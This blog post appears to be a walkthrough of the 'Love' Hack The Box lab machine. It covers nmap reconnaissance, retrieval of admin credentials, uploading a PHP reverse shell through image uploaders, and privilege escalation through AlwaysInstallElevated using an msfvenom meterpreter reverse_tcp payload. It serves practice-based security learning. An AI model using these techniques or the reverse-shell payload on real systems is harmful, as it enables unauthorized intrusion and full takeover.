In this post, i would like to share walkthrough on Love Machine.

This room is been considered difficulty rated as EASY machine

We need to read the following article to fully managed root the machine

Information Gathering

Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

# Nmap 7.91 scan initiated Sat May  1 17:44:08 2021 as: nmap -sC -sV -oA intial -Pn 10.129.102.135
Nmap scan report for 10.129.102.135
Host is up (0.66s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings:
|   DNSStatusRequestTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe:
|_    Host '10.10.16.13' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=5/1%Time=608DCBE3%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines,
SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4A,"
SF:F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20t
SF:o\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4A,"F\0
SF:\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4A,"F\0\0\
SF:x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusRequestTCP,4A,"F
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4A,"F\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connec
SF:t\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4A,"F\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,4A,"F\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connec
SF:t\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,4A,"F\0\0\x01\xffj\
SF:x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x2
SF:0to\x20this\x20MariaDB\x20server")%r(X11Probe,4A,"F\0\0\x01\xffj\x04Hos
SF:t\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(FourOhFourRequest,4A,"F\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to
SF:\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x01\xffj\x04Host\
SF:x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20t
SF:his\x20MariaDB\x20server")%r(LDAPSearchReq,4A,"F\0\0\x01\xffj\x04Host\x
SF:20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th
SF:is\x20MariaDB\x20server")%r(LDAPBindReq,4A,"F\0\0\x01\xffj\x04Host\x20'
SF:10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\
SF:x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 21m20s, deviation: 0s, median: 21m20s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-01T22:07:08
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ 

Let’s see the website interface

The website have show only the Voter’s ID and Password which we doesn’t have at the moment

Let’s us check on other port that mention on nmap result. The website show a forbidden page.

Gaining Access

Oh wait! There’s a subdomain that been mention on the nmap result which is staging.love.htb

The website have been redirected to a Free File Scanner interface which also require login credentials.

Let’s click on the demo link at the top of website.

Let’s scan the url http://10.10.10.239:5000 and we gain a admin credentials such as

username: admin
password: @LoveIsInTheAir!!!!

We need to use those credentials on http://love.htb/admin

We managed to logged into the VotingSystem Dashboard

Let’s do some research on the VotingSystem

I found a few epxloit that we can use on the system itself such as shown the screenshot above

However, the exploit didn’t work well for me so i decided to find another way to get a reverse shell on my machine

After a while, i found another php reverse shell at the website here

We need to download it and modify a little bit on the php code so that the reverse shell connection coming back to us.The modificaiton need to be done at sh=new Sh(‘127.0.0.1’,9000); with your VPN IP and port

There is two location that we use to upload our shell code.

*We need to start our nc listening first

The first location is that we need to create position that we will use on this method. Once that completed, we need to create a new candidate with upload shell at the picture uploader.

For the reverse shell to came back, we need to execute the shell at the url love.htb/images and click the filename that we save as shell

Another location is that location on the admin’s profile where we can upload the shell on the replace picture

Maintaing Access

You will get the shell back if you upload the shell in either places.

We can read the user flag on b going to C:\Users\Phoebe\Desktop and use the command “type user.txt

Escalate to Root Privileges Access

We can run the winpeas.exe on the victim’s machine by transferring the file from our attacker’s machine. After a while, we found out that there’s a feature “AlwaysInstalledElevated” which is normally used to install the MSI package

Let’s do some research on “AlwaysInstalledElevated” exploit.

We found some exploits that use Metasploit Framework. So, let’s start using metasploit.

Firstly, we need to create a crafted exploit by using msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Port> -f exe > darknite.exe command

We need to transfer it into our victim’s machine

We can execute the exploit by type the filename just like show above

We can configure our metasploit exploit by running 2 session of multi/handler with divide by background

We can read the root flag by accessing C:\Users\Adminitrator\Desktop and use the “type root.txt” command

-THE END-

Happy Learning Guys!

Leave a Reply

Your email address will not be published. Required fields are marked *